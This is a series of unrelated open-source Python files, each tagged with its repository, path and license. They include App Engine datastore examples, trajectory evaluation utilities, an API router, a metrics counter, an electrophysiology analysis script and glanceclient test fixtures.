name = db.StringProperty()
class Guild(db.Model):
name = db.StringProperty()
class GuildMembership(db.Model):
player = db.ReferenceProperty(Player, collection_name='guild_memberships')
guild = db.ReferenceProperty(Guild, collection_name='player_memberships')
class MainPage(webapp2.RequestHandler):
def get(self):
# Create some test data.
g1 = Guild(name='The Foo Battlers')
g2 = Guild(name='The Bar Fighters')
p1 = Player(name='druidjane')
p2 = Player(name='TheHulk')
db.put([p1, p2, g1, g2])
gm1 = GuildMembership(player=p1, guild=g1)
gm2 = GuildMembership(player=p1, guild=g2)
gm3 = GuildMembership(player=p2, guild=g2)
db.put([gm1, gm2, gm3])
player_key = p1.key()
guild_key = g2.key()
# ...
# Guilds to which a player belongs:
p = db.get(player_key)
self.response.write('<p>Guilds to which druidjane belongs:</p><ul>')
for gm in p.guild_memberships:
self.response.write('<li>%s</li>' % gm.guild.name)
self.response.write('</ul>')
# Players that belong to a guild:
g = db.get(guild_key)
self.response.write('<p>Members of The Bar Fighters:</p><ul>')
for gm in g.player_memberships:
self.response.write('<li>%s</li>' % gm.player.name)
self.response.write('</ul>')
db.delete([p1, p2, g1, g2, gm1, gm2, gm3])
self.response.write('<p>Entities deleted.</p>')
self.response.write('<p>The time is: %s</p>'
% str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
| jscontreras/learning-gae | pgae-examples-master/2e/python/ext_db/relationshipslinkmodel/main.py | Python | lgpl-3.0 | 1,837 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LongWrapper(Model):
"""LongWrapper.
:param field1:
:type field1: long
:param field2:
:type field2: long
"""
_attribute_map = {
'field1': {'key': 'field1', 'type': 'long'},
'field2': {'key': 'field2', 'type': 'long'},
}
def __init__(self, field1=None, field2=None):
self.field1 = field1
self.field2 = field2
| balajikris/autorest | src/generator/AutoRest.Python.Tests/Expected/AcceptanceTests/BodyComplex/autorestcomplextestservice/models/long_wrapper.py | Python | mit | 899 |
# Some of the code are from the TUM evaluation toolkit:
# https://vision.in.tum.de/data/datasets/rgbd-dataset/tools#absolute_trajectory_error_ate
import math
import numpy as np
def compute_ate(gtruth_file, pred_file):
gtruth_list = read_file_list(gtruth_file)
pred_list = read_file_list(pred_file)
matches = associate(gtruth_list, pred_list, 0, 0.01)
if len(matches) < 2:
return False
gtruth_xyz = np.array([[float(value) for value in gtruth_list[a][0:3]] for a,b in matches])
pred_xyz = np.array([[float(value) for value in pred_list[b][0:3]] for a,b in matches])
# Make sure that the first matched frames align (no need for rotational alignment as
# all the predicted/ground-truth snippets have been converted to use the same coordinate
# system with the first frame of the snippet being the origin).
offset = gtruth_xyz[0] - pred_xyz[0]
pred_xyz += offset[None,:]
# Optimize the scaling factor
scale = np.sum(gtruth_xyz * pred_xyz)/np.sum(pred_xyz ** 2)
alignment_error = pred_xyz * scale - gtruth_xyz
rmse = np.sqrt(np.sum(alignment_error ** 2))/len(matches)
return rmse
def read_file_list(filename):
"""
Reads a trajectory from a text file.
File format:
The file format is "stamp d1 d2 d3 ...", where stamp denotes the time stamp (to be matched)
and "d1 d2 d3.." is arbitary data (e.g., a 3D position and 3D orientation) associated to this timestamp.
Input:
filename -- File name
Output:
dict -- dictionary of (stamp,data) tuples
"""
file = open(filename)
data = file.read()
lines = data.replace(","," ").replace("\t"," ").split("\n")
list = [[v.strip() for v in line.split(" ") if v.strip()!=""] for line in lines if len(line)>0 and line[0]!="#"]
list = [(float(l[0]),l[1:]) for l in list if len(l)>1]
return dict(list)
def associate(first_list, second_list,offset,max_difference):
"""
Associate two dictionaries of (stamp,data). As the time stamps never match exactly, we aim
to find the closest match for every input tuple.
Input:
first_list -- first dictionary of (stamp,data) tuples
second_list -- second dictionary of (stamp,data) tuples
offset -- time offset between both dictionaries (e.g., to model the delay between the sensors)
max_difference -- search radius for candidate generation
Output:
matches -- list of matched tuples ((stamp1,data1),(stamp2,data2))
"""
first_keys = list(first_list.keys())
second_keys = list(second_list.keys())
potential_matches = [(abs(a - (b + offset)), a, b)
for a in first_keys
for b in second_keys
if abs(a - (b + offset)) < max_difference]
potential_matches.sort()
matches = []
for diff, a, b in potential_matches:
if a in first_keys and b in second_keys:
first_keys.remove(a)
second_keys.remove(b)
matches.append((a, b))
matches.sort()
return matches
def rot2quat(R):
rz, ry, rx = mat2euler(R)
qw, qx, qy, qz = euler2quat(rz, ry, rx)
return qw, qx, qy, qz
def quat2mat(q):
''' Calculate rotation matrix corresponding to quaternion
https://afni.nimh.nih.gov/pub/dist/src/pkundu/meica.libs/nibabel/quaternions.py
Parameters
----------
q : 4 element array-like
Returns
-------
M : (3,3) array
Rotation matrix corresponding to input quaternion *q*
Notes
-----
Rotation matrix applies to column vectors, and is applied to the
left of coordinate vectors. The algorithm here allows non-unit
quaternions.
References
----------
Algorithm from
http://en.wikipedia.org/wiki/Rotation_matrix#Quaternion
Examples
--------
>>> import numpy as np
>>> M = quat2mat([1, 0, 0, 0]) # Identity quaternion
>>> np.allclose(M, np.eye(3))
True
>>> M = quat2mat([0, 1, 0, 0]) # 180 degree rotn around axis 0
>>> np.allclose(M, np.diag([1, -1, -1]))
True
'''
w, x, y, z = q
Nq = w*w + x*x + y*y + z*z
if Nq < 1e-8:
return np.eye(3)
s = 2.0/Nq
X = x*s
Y = y*s
Z = z*s
wX = w*X; wY = w*Y; wZ = w*Z
xX = x*X; xY = x*Y; xZ = x*Z
yY = y*Y; yZ = y*Z; zZ = z*Z
return np.array(
[[ 1.0-(yY+zZ), xY-wZ, xZ+wY ],
[ xY+wZ, 1.0-(xX+zZ), yZ-wX ],
[ xZ-wY, yZ+wX, 1.0-(xX+yY) ]])
def mat2euler(M, cy_thresh=None, seq='zyx'):
'''
Taken From: http://afni.nimh.nih.gov/pub/dist/src/pkundu/meica.libs/nibabel/eulerangles.py
Discover Euler angle vector from 3x3 matrix
Uses the conventions above.
Parameters
----------
M : array-like, shape (3,3)
cy_thresh : None or scalar, optional
threshold below which to give up on straightforward arctan for
estimating x rotation. If None (default), estimate from
precision of input.
Returns
-------
z : scalar
y : scalar
x : scalar
Rotations in radians around z, y, x axes, respectively
Notes
-----
If there was no numerical error, the routine could be derived using
Sympy expression for z then y then x rotation matrix, which is::
[ cos(y)*cos(z), -cos(y)*sin(z), sin(y)],
[cos(x)*sin(z) + cos(z)*sin(x)*sin(y), cos(x)*cos(z) - sin(x)*sin(y)*sin(z), -cos(y)*sin(x)],
[sin(x)*sin(z) - cos(x)*cos(z)*sin(y), cos(z)*sin(x) + cos(x)*sin(y)*sin(z), cos(x)*cos(y)]
with the obvious derivations for z, y, and x
z = atan2(-r12, r11)
y = asin(r13)
x = atan2(-r23, r33)
for x,y,z order
y = asin(-r31)
x = atan2(r32, r33)
z = atan2(r21, r11)
Problems arise when cos(y) is close to zero, because both of::
z = atan2(cos(y)*sin(z), cos(y)*cos(z))
x = atan2(cos(y)*sin(x), cos(x)*cos(y))
will be close to atan2(0, 0), and highly unstable.
The ``cy`` fix for numerical instability below is from: *Graphics
Gems IV*, Paul Heckbert (editor), Academic Press, 1994, ISBN:
0123361559. Specifically it comes from EulerAngles.c by Ken
Shoemake, and deals with the case where cos(y) is close to zero:
See: http://www.graphicsgems.org/
The code appears to be licensed (from the website) as "can be used
without restrictions".
'''
M = np.asarray(M)
if cy_thresh is None:
try:
cy_thresh = np.finfo(M.dtype).eps * 4
except ValueError:
cy_thresh = _FLOAT_EPS_4
r11, r12, r13, r21, r22, r23, r31, r32, r33 = M.flat
# cy: sqrt((cos(y)*cos(z))**2 + (cos(x)*cos(y))**2)
cy = math.sqrt(r33*r33 + r23*r23)
if seq=='zyx':
if cy > cy_thresh: # cos(y) not close to zero, standard form
z = math.atan2(-r12, r11) # atan2(cos(y)*sin(z), cos(y)*cos(z))
y = math.atan2(r13, cy) # atan2(sin(y), cy)
x = math.atan2(-r23, r33) # atan2(cos(y)*sin(x), cos(x)*cos(y))
else: # cos(y) (close to) zero, so x -> 0.0 (see above)
# so r21 -> sin(z), r22 -> cos(z) and
z = math.atan2(r21, r22)
y = math.atan2(r13, cy) # atan2(sin(y), cy)
x = 0.0
elif seq=='xyz':
if cy > cy_thresh:
y = math.atan2(-r31, cy)
x = math.atan2(r32, r33)
z = math.atan2(r21, r11)
else:
z = 0.0
if r31 < 0:
y = np.pi/2
x = atan2(r12, r13)
else:
y = -np.pi/2
else:
raise Exception('Sequence not recognized')
return z, y, x
import functools
def euler2mat(z=0, y=0, x=0, isRadian=True):
''' Return matrix for rotations around z, y and x axes
Uses the z, then y, then x convention above
Parameters
----------
z : scalar
Rotation angle in radians around z-axis (performed first)
y : scalar
Rotation angle in radians around y-axis
x : scalar
Rotation angle in radians around x-axis (performed last)
Returns
-------
M : array shape (3,3)
Rotation matrix giving same rotation as for given angles
Examples
--------
>>> zrot = 1.3 # radians
>>> yrot = -0.1
>>> xrot = 0.2
>>> M = euler2mat(zrot, yrot, xrot)
>>> M.shape == (3, 3)
True
The output rotation matrix is equal to the composition of the
individual rotations
>>> M1 = euler2mat(zrot)
>>> M2 = euler2mat(0, yrot)
>>> M3 = euler2mat(0, 0, xrot)
>>> composed_M = np.dot(M3, np.dot(M2, M1))
>>> np.allclose(M, composed_M)
True
You can specify rotations by named arguments
>>> np.all(M3 == euler2mat(x=xrot))
True
When applying M to a vector, the vector should column vector to the
right of M. If the right hand side is a 2D array rather than a
vector, then each column of the 2D array represents a vector.
>>> vec = np.array([1, 0, 0]).reshape((3,1))
>>> v2 = np.dot(M, vec)
>>> vecs = np.array([[1, 0, 0],[0, 1, 0]]).T # giving 3x2 array
>>> vecs2 = np.dot(M, vecs)
Rotations are counter-clockwise.
>>> zred = np.dot(euler2mat(z=np.pi/2), np.eye(3))
>>> np.allclose(zred, [[0, -1, 0],[1, 0, 0], [0, 0, 1]])
True
>>> yred = np.dot(euler2mat(y=np.pi/2), np.eye(3))
>>> np.allclose(yred, [[0, 0, 1],[0, 1, 0], [-1, 0, 0]])
True
>>> xred = np.dot(euler2mat(x=np.pi/2), np.eye(3))
>>> np.allclose(xred, [[1, 0, 0],[0, 0, -1], [0, 1, 0]])
True
Notes
-----
The direction of rotation is given by the right-hand rule (orient
the thumb of the right hand along the axis around which the rotation
occurs, with the end of the thumb at the positive end of the axis;
curl your fingers; the direction your fingers curl is the direction
of rotation). Therefore, the rotations are counterclockwise if
looking along the axis of rotation from positive to negative.
'''
if not isRadian:
z = ((np.pi)/180.) * z
y = ((np.pi)/180.) * y
x = ((np.pi)/180.) * x
assert z>=(-np.pi) and z < np.pi, 'Inapprorpriate z: %f' % z
assert y>=(-np.pi) and y < np.pi, 'Inapprorpriate y: %f' % y
assert x>=(-np.pi) and x < np.pi, 'Inapprorpriate x: %f' % x
Ms = []
if z:
cosz = math.cos(z)
sinz = math.sin(z)
Ms.append(np.array(
[[cosz, -sinz, 0],
[sinz, cosz, 0],
[0, 0, 1]]))
if y:
cosy = math.cos(y)
siny = math.sin(y)
Ms.append(np.array(
[[cosy, 0, siny],
[0, 1, 0],
[-siny, 0, cosy]]))
if x:
cosx = math.cos(x)
sinx = math.sin(x)
Ms.append(np.array(
[[1, 0, 0],
[0, cosx, -sinx],
[0, sinx, cosx]]))
if Ms:
return functools.reduce(np.dot, Ms[::-1])
return np.eye(3)
def euler2quat(z=0, y=0, x=0, isRadian=True):
''' Return quaternion corresponding to these Euler angles
Uses the z, then y, then x convention above
Parameters
----------
z : scalar
Rotation angle in radians around z-axis (performed first)
y : scalar
Rotation angle in radians around y-axis
x : scalar
Rotation angle in radians around x-axis (performed last)
Returns
-------
quat : array shape (4,)
Quaternion in w, x, y z (real, then vector) format
Notes
-----
We can derive this formula in Sympy using:
1. Formula giving quaternion corresponding to rotation of theta radians
about arbitrary axis:
http://mathworld.wolfram.com/EulerParameters.html
2. Generated formulae from 1.) for quaternions corresponding to
theta radians rotations about ``x, y, z`` axes
3. Apply quaternion multiplication formula -
http://en.wikipedia.org/wiki/Quaternions#Hamilton_product - to
formulae from 2.) to give formula for combined rotations.
'''
if not isRadian:
z = ((np.pi)/180.) * z
y = ((np.pi)/180.) * y
x = ((np.pi)/180.) * x
z = z/2.0
y = y/2.0
x = x/2.0
cz = math.cos(z)
sz = math.sin(z)
cy = math.cos(y)
sy = math.sin(y)
cx = math.cos(x)
sx = math.sin(x)
return np.array([
cx*cy*cz - sx*sy*sz,
cx*sy*sz + cy*cz*sx,
cx*cz*sy - sx*cy*sz,
cx*cy*sz + sx*cz*sy])
def pose_vec_to_mat(vec):
tx = vec[0]
ty = vec[1]
tz = vec[2]
trans = np.array([tx, ty, tz]).reshape((3,1))
rot = euler2mat(vec[5], vec[4], vec[3])
Tmat = np.concatenate((rot, trans), axis=1)
hfiller = np.array([0, 0, 0, 1]).reshape((1,4))
Tmat = np.concatenate((Tmat, hfiller), axis=0)
return Tmat
def dump_pose_seq_TUM(out_file, poses, times):
# First frame as the origin
first_pose = pose_vec_to_mat(poses[0])
with open(out_file, 'w') as f:
for p in range(len(times)):
this_pose = pose_vec_to_mat(poses[p])
this_pose = np.dot(first_pose, np.linalg.inv(this_pose))
tx = this_pose[0, 3]
ty = this_pose[1, 3]
tz = this_pose[2, 3]
rot = this_pose[:3, :3]
qw, qx, qy, qz = rot2quat(rot)
f.write('%f %f %f %f %f %f %f %f\n' % (times[p], tx, ty, tz, qx, qy, qz, qw)) | tinghuiz/SfMLearner | kitti_eval/pose_evaluation_utils.py | Python | mit | 13,592 |
# $Filename$
# $Authors$
# Last Changed: $Date$ $Committer$ $Revision-Id$
#
# Copyright (c) 2003-2011, German Aerospace Center (DLR)
#
# All rights reserved.
#Redistribution and use in source and binary forms, with or without
#modification, are permitted provided that the following conditions are
#
#met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the
# distribution.
#
# * Neither the name of the German Aerospace Center nor the names of
# its contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
#THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
#LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
#A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
#OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
#SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
#DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
#THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
#(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
#OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Base class for the adaptor specific file system factory implementations.
"""
import decimal
from datafinder.persistence.common import character_constants as char_const
from datafinder.persistence.data.datastorer import NullDataStorer
from datafinder.persistence.metadata.metadatastorer import NullMetadataStorer
from datafinder.persistence.principal_search.principalsearcher import NullPrincipalSearcher
from datafinder.persistence.privileges.privilegestorer import NullPrivilegeStorer
from datafinder.persistence.search.searcher import NullSearcher
__version__ = "$Revision-Id:$"
class BaseFileSystem(object):
""" Base class for the adaptor specific file system factory implementations. """
@property
def canHandleLocation(self):
"""
Indicates if the FileSystem can handle the location.
@return: True if FileSystem can handle the location, False if not.
"""
self = self
return True
def createDataStorer(self, identifier):
"""
Factory method an adapter specific data storer.
@return: Adapter specific data storer.
@rtype: instanceOf L{NullDataStorer<datafinder.persistence.data.datastorer.NullDataStorer>}
"""
self = self # silent pylint
return NullDataStorer(identifier)
def createMetadataStorer(self, identifier):
"""
Factory method an adapter specific meta data storer.
@return: Adapter specific meta data storer.
@rtype: instanceOf L{NullMetadataStorer<datafinder.persistence.metadata.metadatastorer.NullMetadataStorer>}
"""
self = self # silent pylint
return NullMetadataStorer(identifier)
def createPrivilegeStorer(self, identifier):
"""
Factory method an adapter specific meta data storer.
@return: Adapter specific meta data storer.
@rtype: instanceOf L{NullMetadataStorer<datafinder.persistence.privileges.privilegestorer.NullPrivilegeStorer>}
"""
self = self # silent pylint
return NullPrivilegeStorer(identifier)
def createPrincipalSearcher(self):
"""
Factory method an adapter specific meta data storer.
@return: Adapter specific meta data storer.
@rtype: instanceOf L{NullMetadataStorer<datafinder.persistence.privileges.privilegestorer.NullPrivilegeStorer>}
"""
self = self # silent pylint
return NullPrincipalSearcher()
def createSearcher(self):
"""
Factory method an adapter specific meta data storer.
@return: Adapter specific meta data storer.
@rtype: instanceOf L{NullMetadataStorer<datafinder.persistence.search.searcher.NullSearcher>}
"""
self = self # silent pylint
return NullSearcher()
def release(self):
"""
@see: L{FileSystem.release<datafinder.persistence.factory.FileSystem.release>}
@note: The default implementation does nothing.
"""
pass
def updateCredentials(self, credentials):
"""
@see: L{FileSystem.updateCredentials<datafinder.persistence.factory.FileSystem.updateCredentials>}
@note: The default implementation does nothing.
"""
pass
def prepareUsage(self):
"""
Prepares usage of the file system.
@note: The default implementation does nothing.
"""
pass
def isValidIdentifier(self, name):
"""
@see: L{FileSystem.isValidIdentifier<datafinder.persistence.factory.FileSystem.metadataIdentifierPattern>}
@note: This implementation always returns C{True}, C{None}.
"""
return self._validateIdentifier(name,
char_const.IDENTIFIER_INVALID_CHARACTER_RE,
char_const.IDENTIFIER_VALID_STARTCHARACTER_RE)
@staticmethod
def _validateIdentifier(name, invalidCharRe, validStartCharRe):
""" Helper used for identifier validation. """
isValidIdentifer = False, None
if not name is None and len(name.strip()) > 0:
result = invalidCharRe.search(name)
if not result is None:
isValidIdentifer = False, result.start()
else:
if validStartCharRe.match(name):
isValidIdentifer = True, None
else:
isValidIdentifer = False, 0
return isValidIdentifer
def isValidMetadataIdentifier(self, name): # W0613
"""
@see: L{FileSystem.metadataIdentifier<datafinder.persistence.factory.FileSystem.metadataIdentifierPattern>}
@note: This implementation always returns C{True}, C{None}.
"""
return self._validateIdentifier(name,
char_const.PROPERTYNAME_INVALID_CHARACTER_RE,
char_const.PROPERTYNAME_VALID_STARTCHARACTER_RE)
@property
def hasCustomMetadataSupport(self):
"""
@see: L{FileSystem.hasCustomMetadataSupport<datafinder.persistence.factory.FileSystem.hasCustomMetadataSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
@property
def hasMetadataSearchSupport(self):
"""
@see: L{FileSystem.hasMetadataSearchSupport<datafinder.persistence.factory.FileSystem.hasMetadataSearchSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
@property
def hasPrivilegeSupport(self):
"""
@see: L{FileSystem.hasPrivilegeSupport<datafinder.persistence.factory.FileSystem.hasPrivilegeSupport>}
@note: This implementation always returns C{False}.
"""
self = self # silent pylint
return False
def determineFreeDiskSpace(self):
"""
@see: L{FileSystem.determineFreeDiskSpace<datafinder.persistence.factory.FileSystem.determineFreeDiskSpace>}
"""
return decimal.Decimal('infinity')
| DLR-SC/DataFinder | src/datafinder/persistence/common/base_factory.py | Python | bsd-3-clause | 8,251 |
# coding: utf-8
from rest_framework_extensions.routers import ExtendedDefaultRouter
from kobo.apps.hook.views.v2.hook import HookViewSet
from kobo.apps.hook.views.v2.hook_log import HookLogViewSet
from kobo.apps.hook.views.v2.hook_signal import HookSignalViewSet
from kpi.views.v2.asset import AssetViewSet
from kpi.views.v2.asset_export_settings import AssetExportSettingsViewSet
from kpi.views.v2.asset_file import AssetFileViewSet
from kpi.views.v2.asset_permission_assignment import AssetPermissionAssignmentViewSet
from kpi.views.v2.asset_snapshot import AssetSnapshotViewSet
from kpi.views.v2.asset_version import AssetVersionViewSet
from kpi.views.v2.data import DataViewSet
from kpi.views.v2.export_task import ExportTaskViewSet
from kpi.views.v2.import_task import ImportTaskViewSet
from kpi.views.v2.paired_data import PairedDataViewset
from kpi.views.v2.permission import PermissionViewSet
from kpi.views.v2.user import UserViewSet
from kpi.views.v2.user_asset_subscription import UserAssetSubscriptionViewSet
URL_NAMESPACE = 'api_v2'
router_api_v2 = ExtendedDefaultRouter()
asset_routes = router_api_v2.register(r'assets', AssetViewSet, basename='asset')
asset_routes.register(r'files',
AssetFileViewSet,
basename='asset-file',
parents_query_lookups=['asset'],
)
asset_routes.register(r'permission-assignments',
AssetPermissionAssignmentViewSet,
basename='asset-permission-assignment',
parents_query_lookups=['asset'],
)
asset_routes.register(r'versions',
AssetVersionViewSet,
basename='asset-version',
parents_query_lookups=['asset'],
)
asset_routes.register(r'data',
DataViewSet,
basename='submission',
parents_query_lookups=['asset'],
)
asset_routes.register(r'export-settings',
AssetExportSettingsViewSet,
basename='asset-export-settings',
parents_query_lookups=['asset'],
)
asset_routes.register(r'exports',
ExportTaskViewSet,
basename='asset-export',
parents_query_lookups=['asset'],
)
asset_routes.register(r'hook-signal',
HookSignalViewSet,
basename='hook-signal',
parents_query_lookups=['asset'],
)
asset_routes.register(r'paired-data',
PairedDataViewset,
basename='paired-data',
parents_query_lookups=['asset'],
)
hook_routes = asset_routes.register(r'hooks',
HookViewSet,
basename='hook',
parents_query_lookups=['asset'],
)
hook_routes.register(r'logs',
HookLogViewSet,
basename='hook-log',
parents_query_lookups=['asset', 'hook'],
)
router_api_v2.register(r'asset_snapshots', AssetSnapshotViewSet)
router_api_v2.register(
r'asset_subscriptions', UserAssetSubscriptionViewSet)
router_api_v2.register(r'users', UserViewSet)
router_api_v2.register(r'permissions', PermissionViewSet)
router_api_v2.register(r'imports', ImportTaskViewSet)
# TODO migrate ViewSet below
# router_api_v2.register(r'sitewide_messages', SitewideMessageViewSet)
#
# router_api_v2.register(r'authorized_application/users',
# AuthorizedApplicationUserViewSet,
# basename='authorized_applications')
# router_api_v2.register(r'authorized_application/one_time_authentication_keys',
# OneTimeAuthenticationKeyViewSet)
| kobotoolbox/kpi | kpi/urls/router_api_v2.py | Python | agpl-3.0 | 4,029 |
from datetime import datetime, timedelta
def get_total_seconds(td):
if hasattr(timedelta, 'total_seconds'):
return td.total_seconds()
else:
return int(
(td.microseconds + (td.seconds + td.days * 24 * 3600) * 10 ** 6) / 10 ** 6)
class Spy:
def __init__(self):
self.eventList = []
def trimEventList(self, timestamp):
while len(self.eventList) > 0:
first_event = self.eventList[0]
time_delta = timestamp - first_event['timestamp']
if get_total_seconds(time_delta) > 60:
del self.eventList[0]
else:
return
def report(self, size):
now = datetime.now()
self.trimEventList(now)
if len(self.eventList) > 0:
last_batch = self.eventList[-1]
time_delta = now - last_batch['timestamp']
if get_total_seconds(time_delta) < 10:
last_batch['sum'] += size
last_batch['count'] += 1
return
self.eventList.append({'timestamp': now, 'sum': size, 'count': 1})
def get_metrics(self):
now = datetime.now()
count = 0
summary = 0
for batch in self.eventList:
timedelta = now - batch['timestamp']
if get_total_seconds(timedelta) > 60:
break
count += batch['count']
summary += batch['sum']
return {"sum": summary, "count": count}
TRIGGER_CHECK = Spy()
TRIGGER_CHECK_ERRORS = Spy()
| AlexAkulov/worker | moira/metrics/spy.py | Python | gpl-3.0 | 1,530 |
"""
let's just graph mean and mode with time.
also graph variance with time.
as mode moves around mean, it shows EPSC/IPSC balance.
Could the ratio be multiplied by the variance to return it to original magnitude?
"""
import os
import sys
sys.path.append("../../../../")
import swhlab
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import numpy as np
import time
class ABF2(swhlab.ABF):
def sweepYfilteredHisto(self):
chunkSize=100 #ms
pad=int(abf.pointsPerMs*chunkSize)
smooth=np.empty(len(self.sweepY))
smooth[:]=np.nan
for chunk in range(int(len(self.sweepY)/pad)):
I1,I2=int(chunk*pad),int((chunk+1)*pad)
smooth[I1:I2]=np.median(self.sweepY[I1:I2])
#smooth=swhlab.common.lowpass(smooth)
return self.sweepY-smooth
def phasicTonic(self,m1=None,m2=None,chunkMs=50,
quietPercentile=10,histResolution=1):
"""
chunkMs should be ~50 ms or greater.
bin sizes must be equal to or multiples of the data resolution.
transients smaller than the expected RMS will be silenced.
"""
# prepare sectioning values to be used later (marker positions)
m1=0 if m1 is None else m1*self.pointsPerSec
m2=len(abf.sweepY) if m2 is None else m2*self.pointsPerSec
m1,m2=int(m1),int(m2)
# prepare histogram values to be used later
padding=200 # pA or mV of maximum expected deviation
chunkPoints=int(chunkMs*self.pointsPerMs)
histBins=int((padding*2)/histResolution)
# center the data at 0 using peak histogram, not the mean
#Y=self.sweepY[m1:m2]
Y=self.sweepYfilteredHisto()[m1:m2]
hist,bins=np.histogram(Y,bins=2*padding)
#Yoffset=bins[np.where(hist==max(hist))[0][0]]
#Y=Y-Yoffset # we don't have to, but PDF math is easier
# create histogram for all data in the sweep
nChunks=int(len(Y)/chunkPoints)
hist,bins=np.histogram(Y,bins=histBins,range=(-padding,padding))
# create histogram for just the sweeps with the lowest variance
chunks=np.reshape(Y[:nChunks*chunkPoints],(nChunks,chunkPoints))
#variances=np.var(chunks,axis=1)
variances=np.ptp(chunks,axis=1)
percentiles=np.empty(len(variances))
for i,variance in enumerate(variances):
percentiles[i]=sorted(variances).index(variance)/len(variances)*100
blData=chunks[np.where(percentiles<=quietPercentile)[0]].flatten()
blHist,blBins=np.histogram(blData,bins=histBins,range=(-padding,padding))
blHist=blHist/max(blHist)*max(hist)
# determine the phasic current by subtracting-out the baseline
diff=hist-blHist
return diff/abf.pointsPerSec # charge/sec
if __name__=="__main__":
#abfPath=r"X:\Data\2P01\2016\2016-09-01 PIR TGOT"
abfPath=r"C:\Users\scott\Documents\important\demodata"
abf=ABF2(os.path.join(abfPath,"16d14036.abf"))
#abf=ABF2(os.path.join(abfPath,"16d16007.abf"))
t=time.perf_counter()
Xs=np.arange(abf.sweeps)*abf.sweepLength
pos,neg=np.zeros(len(Xs)),np.zeros(len(Xs))
for sweep in abf.setsweeps():
print("on sweep %d of %d"%(sweep,abf.sweeps))
phasic=abf.phasicTonic(.5)
neg[sweep],pos[sweep]=np.sum(np.split(phasic,2),1)
np.save("neg.npy",neg)
np.save("pos.npy",pos)
t=time.perf_counter()-t
plt.figure(figsize=(10,5))
plt.grid()
plt.title("analysis of %s completed in %.02f S"%(abf.ID,t))
plt.plot(Xs,pos,'.',color='b',alpha=.3)
plt.plot(Xs,swhlab.common.lowpass(pos),'-',color='b',alpha=.5,lw=5,label="upward")
plt.plot(Xs,neg,'.',color='r',alpha=.3)
plt.plot(Xs,swhlab.common.lowpass(neg),'-',color='r',alpha=.5,lw=5,label="downward")
for sweep in abf.comment_times:
plt.axvline(sweep,lw=5,alpha=.5,color='g',ls='--')
plt.axhline(0,color='k',lw=3,alpha=.5)
plt.xlabel("time (secods)")
plt.ylabel("ms * pA / sec")
plt.legend(loc='upper left',shadow=True)
plt.margins(0,.1)
plt.show()
print("DONE") | swharden/SWHLab | doc/uses/EPSCs-and-IPSCs/variance method/2016-12-18 01 curve fit.py | Python | mit | 4,194 |
# Copyright 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from glanceclient.tests import utils
from glanceclient.v2 import metadefs
NAMESPACE1 = 'Namespace1'
PROPERTY1 = 'Property1'
PROPERTY2 = 'Property2'
PROPERTYNEW = 'PropertyNew'
data_fixtures = {
"/v2/metadefs/namespaces/%s/properties" % NAMESPACE1: {
"GET": (
{},
{
"properties": {
PROPERTY1: {
"default": "1",
"type": "integer",
"description": "Number of cores.",
"title": "cores"
},
PROPERTY2: {
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "Specifies the CPU manufacturer.",
"title": "Vendor"
},
}
}
),
"POST": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "UPDATED_DESCRIPTION",
"title": "Vendor",
"name": PROPERTYNEW
}
),
"DELETE": (
{},
{}
)
},
"/v2/metadefs/namespaces/%s/properties/%s" % (NAMESPACE1, PROPERTY1): {
"GET": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "Specifies the CPU manufacturer.",
"title": "Vendor"
}
),
"PUT": (
{},
{
"items": {
"enum": [
"Intel",
"AMD"
],
"type": "string"
},
"type": "array",
"description": "UPDATED_DESCRIPTION",
"title": "Vendor"
}
),
"DELETE": (
{},
{}
)
}
}
schema_fixtures = {
"metadefs/property": {
"GET": (
{},
{
"additionalProperties": False,
"definitions": {
"positiveIntegerDefault0": {
"allOf": [
{
"$ref": "#/definitions/positiveInteger"
},
{
"default": 0
}
]
},
"stringArray": {
"minItems": 1,
"items": {
"type": "string"
},
"uniqueItems": True,
"type": "array"
},
"positiveInteger": {
"minimum": 0,
"type": "integer"
}
},
"required": [
"name",
"title",
"type"
],
"name": "property",
"properties": {
"description": {
"type": "string"
},
"minLength": {
"$ref": "#/definitions/positiveIntegerDefault0"
},
"enum": {
"type": "array"
},
"minimum": {
